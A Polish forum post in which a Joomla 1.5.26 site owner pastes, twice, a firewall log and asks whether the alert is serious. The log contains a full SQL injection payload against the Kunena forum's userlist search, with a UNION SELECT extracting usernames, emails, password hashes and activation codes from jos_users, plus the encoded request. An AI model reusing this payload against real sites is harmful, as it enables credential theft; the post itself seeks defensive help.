zaba600
22-10-2012, 09:42
Witam
Mój serwis: www.wybierzagd.com.pl
Joomla 1.5.26
Dzisiaj dostałem taki komunikat:
forum Marco's interceptor warning
Czy mam się czym martwić? Nie bardzo się orientuję w komunikatach bezpieczeństwa.
Czy coś dodatkowo zabezpieczyć?
Dziękuję z góry za pomoc!
** Union Select [GET:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [GET:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Union Select [REQUEST:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [REQUEST:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
**PAGE / SERVER INFO
*REMOTE_ADDR :
88.252.249.187
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_kunena&func=userlist&search=%25%25'%20and%201=2)%20union%20select%201,% 20concat( 0x62794467346e78,username,0x6861636b65642b62792b44 67346e78,password,0x2a2a73716c7661722a2a),concat(0 x3a,username,0x3a,email,0x3a,password,0x3a,activat ion),'Super%20Administrator','email','2009-11-26%2022:09:28','2009-11-26%2022:09:28',62,1,1,0,0,0,1,15%20from%20jos_user s--%20;
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;
Mój serwis: www.wybierzagd.com.pl
Joomla 1.5.26
Dzisiaj dostałem taki komunikat:
forum Marco's interceptor warning
Czy mam się czym martwić? Nie bardzo się orientuję w komunikatach bezpieczeństwa.
Czy coś dodatkowo zabezpieczyć?
Dziękuję z góry za pomoc!
** Union Select [GET:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [GET:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Union Select [REQUEST:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [REQUEST:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
**PAGE / SERVER INFO
*REMOTE_ADDR :
88.252.249.187
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_kunena&func=userlist&search=%25%25'%20and%201=2)%20union%20select%201,% 20concat( 0x62794467346e78,username,0x6861636b65642b62792b44 67346e78,password,0x2a2a73716c7661722a2a),concat(0 x3a,username,0x3a,email,0x3a,password,0x3a,activat ion),'Super%20Administrator','email','2009-11-26%2022:09:28','2009-11-26%2022:09:28',62,1,1,0,0,0,1,15%20from%20jos_user s--%20;
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;